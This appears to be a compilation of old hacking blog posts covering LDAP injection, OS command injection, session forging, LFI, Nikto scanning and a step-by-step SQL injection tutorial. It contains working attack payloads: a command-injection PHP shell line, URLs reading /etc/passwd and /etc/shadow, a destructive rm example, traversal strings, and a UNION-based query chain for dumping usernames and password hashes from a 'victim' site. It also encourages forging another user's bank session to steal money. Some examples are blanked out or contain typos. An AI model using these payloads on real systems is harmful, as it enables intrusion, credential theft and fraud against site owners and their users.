LDAP injection!!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

LDAP=Lightwieght Directory Access protocol. This protocol is used to accessed directory server over network which use port number 389.

If you don’t know about LDAP then here you go: http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol

LDAP also store name, credit card,email  and other information. LDAP also exploitable like other database. LDAP injection is similarly to SQL injection.

NOTE: Remember i am telling you what i do. So feedback is welcome. I am not master and i don’t want to be master.

Suppose there web site which is allow us to search the website. So i simply put “*“on the search field and click on the search button . If it is really dealing with LDAP then it will match with all directory and output all information on the page.

If it is a URL then it would be like: www.example.com/search.asp?vulnerable=*

Simple way to identify the vulnerability (Bad Input):





Try more…

Hacking is not crime, It is philosophy, It is research!!! 

OS command Injection vulnerabity

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

“OS=Operating System” command injection vulnerability is a high impact vulnerability for server/website.  If any website has OS command injection vulnerability Then a malicious hacker can compromise the website or even the server operating system. If a hacker can detect the vulnerability then he can run any Operating system command. For example, If i run the command “rm -r /var/www”  on my computer then it is going remove “www” but what if i run this command on my victim’s computer ?

How we detect this vulnerability:

Suppose our target address is www.victim.com/vultest/lame.php

And the source code:
<title>Vulnerable Page</title>
<p><b>We will test  OS command injection vulnerability against this pages. Actually developer don’t know how serious the code is.</b></p>

<p><b>Output of command:</b></p>

<p><b><i>This is how OS command injection vulnerability works.</i></b></p>

In that page the php code also:

<? system($_REQUEST['cmd']); ?>

(This is white box... Just copy it and paste into a php web page for practice purpose.)

This is the OS injection vulnerability. For this simple mistake anyone can run any os specific command against the server/website.  

So If we run a simple command "ping" :

We get reply on the page (Also other contents). In real world test we may not see the reply but it delay some time(4-10 seconds?). If this is the case then we can run any command "ls" .

If any of these statement in the source code:


Then it is highly doubt that the site is vulnerable.

Suppose we don't have source code then how we test? Way is fuzzing(Tools, Manually). Sometime we call it black box testing.

To test it we need to write some code for fuzzing purpose or we can use ready tools which are freely downloadable from internet such as burp suit, wfuzz, vulnerability scanner, manually by your hand etc.  I think you have logic for automated testing otherwise get some "False" result by your lam0 tools...

Exploitation : 

Note: Doing it on localhost


It output:


We can run any command:

http://localhost/vultest/lame.php?cmd=cat /etc/passwd
http://localhost/vultest/lame.php?cmd=cat /etc/hosts
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget


I hope i explained it and now we know what is it and how it can be exploited by hackers. But really it is very basic, you need to be more advance.

Let me know(sec00rit3y@gmail.com) if you have any questions.

Good luck !!!   

Breaking The sessions

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Sessions are important for security. If an attacker can break a session/cookie of a active user then he or she can access that account as the user without any password. Some attackers don’t care about it because maybe they don’t know much about it or they feel boring. But how a serious hacker take advantage ? Just they want to get the password easily or by just a sql injection? No, It is not. Actually  a serious hacker look for a hint(Simple vulnerability+Free simple tools) which can make him to go ahead. Anyway, I will explain a little about breaking the sessions because you need to research yourself to learn something good.

When we deal with sessions :

When We can register to a website, Can login, transfer data etc. The session is active until we log out. If the site does not manage sessions for a active account then we may need to log in every second.
Anyway, when the user login and the website save the sessions for next time login(Cookie?). What about when we see like “Keep me logged in always in this site” ? If you even brows the site after 3 days then still you will see that you are logged in without username and password. So If we attempt to log in for first time against a website then the site will do:

set a cookie = dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

2. Session= dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

  So i think that now you know how “session” works.

If the session is compromised by someone then he/she can use this session to log in against the user without any password.

How A hacker can break the sessions:

There are Some way breaking the sessions. Developer often doing mistake when managing the sessions. Most vulnerablites are :

1. Time based.
2. Meaningful
3. Predictable.

Just for understanding i am explaining “Meaningful session vulnerability”

Suppose we logged to our bank “www.bank.com” and our username is “exploit” and password “SecUritYY” . After logged on the site we saw on the address bar , the url is like:

It is really doubtful the URL address. It is using base64 as session id. So if we decode the base64 value then we get:


We see some juicy information but not the password. But still we can use this session to attack other accounts.How?

If we know any correct username,email,ip(Require some social engineering?) then we can make a new session to break the target account. For example, Our victim’s information(I got some information by SE):

user: dollar
email: giveme@victime.org
ip: (Lol This fool clicked on a link)

Now we can encode these information as base64 and edit your cookie or submit directly on URL bar(Because it is GET method). I really hope you logged in then transfer some $$$ to your account? 😉

Hope you understand something about attacking the session…

Special Note: You should research seriously otherwise you will not learn anything from a ready tutorial(Such as free tutorial). You should find out the way from a very simple hint. Don’t think anyone will do everything for you. Just remember, Self help is best help(Just sometime need hints?)

If you get any mistake/errors then please feel free to contact me(I love to fix myself)

Good Luck guys!!!

My favorite website which may help you a lot for learning Computer exploit and Hacking

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

1. Exploit Writng :

I love this site. A lot of information and tutorials. If you are interest to write exploits then go to corelan. There are currently 11 exploit writing tutorial which is basic to advance and even better than others commercial course .

Thanks peter (respect)

2. Vulnerability Research:

If you are serious then you need these site. We always need to search new/old vulnerability. So these site are very good for starting:

2.1. Exploit-db
2.2. securitfocus
2.3. osvdb.org
2.4. web.nvd.nist.gov

3. Metasploit:

Metasploit is popular framework for pentesting. Metasploit is very useful for quick shellcoding .

Nikto web vulnerability scanner.

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Most of time i use nikto for scanning Targets website. It is easy but really powerful . Sometime it is sucks too , because of false positive. Just i will show how to scan your own site . It scan cgi and default file and directory.

Warning:Don’t do anything illegal, I am just sharing that how i practices . If you are black hat hacker and going attack third party website , or doing anything illegal then i am not Responsible for that…

I believe Sharing knowledge mean increasing knowledge .  

Nikto is a perl script. So we need to install perl for playing this (Be aware windows users). If you don’t have this tool yet then go and download it:
http://cirt.net/nikto2 . It is default installed in Backtrack .

Simply ,

root@bt:cd /pentest/web/nikto

root@bt:/pentest/web/nikto# ./nikto.pl -Help

       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don’t ask, don’t send
                               auto  Don’t ask, just send
       -Cgidirs+           Scan these CGI dirs: “none”, “all”, or values like “/cgi/ /cgi-a/”
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator ()
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
        -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes–treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nocache           Disables the response cache
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Single            Single request mode
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval – Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval – Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
                + requires a value

If we give command ./nikto.pl -Help or perl nikto.pl -Help then we get details and all options.

Simply We are going to scan our own company’s website … because we are pentesting it. So easy:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com :

I have tested it on my localhost for pasting here, There are output/vulnerability we may get:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
– Nikto v2.1.5
+ Target IP:          ip address
+ Target Hostname:    target.com
+ Target Port:        80
+ Start Time:         2012-01-21 13:48:22 (time formate)
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/
+ Retrieved x-powered-by header: PHP/5.2.17
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/ appears to be outdated (current is at least (may depend on server version)
+ FrontPage – http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm — a DoS was not attempted.
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ Default account found for ‘Secured Frontpage on PennyStockAdvice.com’ at /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals (ID ”, PW ‘_Cisco’). Cisco device.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /stats/: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ OSVDB-3092: /as/: This might be interesting… potential country code (American Samoa)
+ OSVDB-3092: /ms/: This might be interesting… potential country code (Montserrat)
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time:           2012-01-21 13:58:55 (Time formate) (4233 seconds)
+ 1 host(s) tested

  As you can see there are many thing Nikto found out. Nikto is very effective for finding default file,directory.

Note: you have to understand the output of tools otherwise you can do nothing.

we can use various options(see help)…. For example a command:

root@bt:/pentest/web/nikto#./nikto.pl -host target.com -root /admin -port 443 -evasion 1

How is this working ? Simple:
-host=-h(The target site)
-root=send all request to /admin directory
-port = The site is not running on default 80 , I know it is running on 443.
-evasion=IDs evasion.  Evasion 1(Random URI encoding (non-UTF8))

I hope you got some idea about it… Just try to believe that Learning to use tools peoples does not need hacking training.

If your mind is skid then tools may not help you.. . Be aware about that before using tools .

For more information Visit  http://cirt.net/nikto2

Good Luck!!!

Exploiting Local File Inclusion vulnerability(LFI)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Local File Inclusion mean loading local file such as /etc/passwd , /etc/host on the php web pages. There are many programing mistake for occurring this vulnerability. When Programer put some bad in the php web pages that time this vulnerable occur:


For example, suppose in a pages :

$vulnerable = $_GET[vulnerable];
($vulnerable); #this maybe require,require_once, fopen etc

This is code is vulnerable to Local file inclusion vulnerable.

Suppose , Our target url is www.n00bprogammer.com/vulnerable/

If you directly submit this url on browser address bar then you get web page , That’s mean there is a file “index.php”

If we try like :

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)


And it output :
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false

That’s mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)… So there is no permission then you can’t read /etc/shadow file.

There are many file you may interest to read :

/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
There are many sites which have unnecessary url variable with file extension... They use the value 
  php,images,asp file. This is not secure at all. For example :


This maybe also vulnerable to LFI... Try.

Advance hackers can go more deeply. Such as: 

1. There are some special way attacking application tier for rooting the system(Hint: overwriting error_log).
2. Reading more advance file (Hint: SQL).

Try them , Research and learn...
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any question please...

SQL injection explained

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today i will explain the SQL injection. Input based attack is most effective for testing web security. And the SQL is most popular for web hacking. No wait, Let’s start(Hey, i am not going to explain what is SQL injection; it is how to exploit).

Testing if the target is vulnerable :

Suppose the target site is http://www.victim.com. We can quickly gather some information by Google for finding some parameters based URL. Simply if go to google and search like :

site:www.victim.com filetype:php

(Note: I think you already gathered some information against the site . So you know what is their file extension . If you are attacking randomly then go away from here.)

Then we see many result like:



Simply browse the www.victim.com/something.php?id=3 and add one more thing . Example:


If the site is vulnerable then we will see SQL error like:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” AND products.obsolete=’N” at line 1

If we see this error on that page then we are confirm the site is vulnerable and exploitable. 


Finding the columns Number:

First we will check that how column is available by “ORDER BY” query. If we reach the more than available columns then we will get error “Unknown Column”.

No error:

www.victim.com/something.php?id=3 ORDER BY 4–

No error:

www.victim.com/something.php?id=3 ORDER BY 5–


www.victim.com/something.php?id=3 ORDER BY 6–

Now we are confirm that it has 6 columns . If you get no error then try more columns 7,8,9  etc.

How to find the Vulnerable column

To find the Vulnerable columns we need “UNION SELECT” command. So:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,5,6–

Now we will see 1-6(Anyone or multiple) number on pages. Suppose we see it is “5”

So now we know the column number 5 is vulnerable.

Checking the MySQL version :

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,@@version,6–

We know the MySQL version is 5(version 4 won’t work).

Great ! now We quickly need their Users database dump. So quick !!!

Now we need the all tables name

Getting Tables Name  

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_scheam=database()–

So we get several tables name. For example we get :





We want to logging as a powerful user so that we can edit their pages. To do this first we need to find out columns name:

Getting Columns name:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(columns_name),6 from information_schema.tables where table_name=users–

So from this query we get output like :


It is simply understandable that we need username and password columns for getting admin access:

Grabbing The username and password:

www.victim.com/something.php?id=-3 UNION SELECTS 1,2,3,4,group_concat(username,0x3a,password),6 from users–

So you get output all username and password like, admin:akde3d09kd4ur489deqa9094ldad48dkr 


Now crack the hash and then logging with username  “admin” or “super” and plain text(Cracked).

If you don’t know how to crack hash check out other articles…

There are many sql injection technique …. but I explained here which is very common. So try more , research and research.

I hope there are some mistake i made… If you can catch them then feel free to contact me..

Good Luck!!!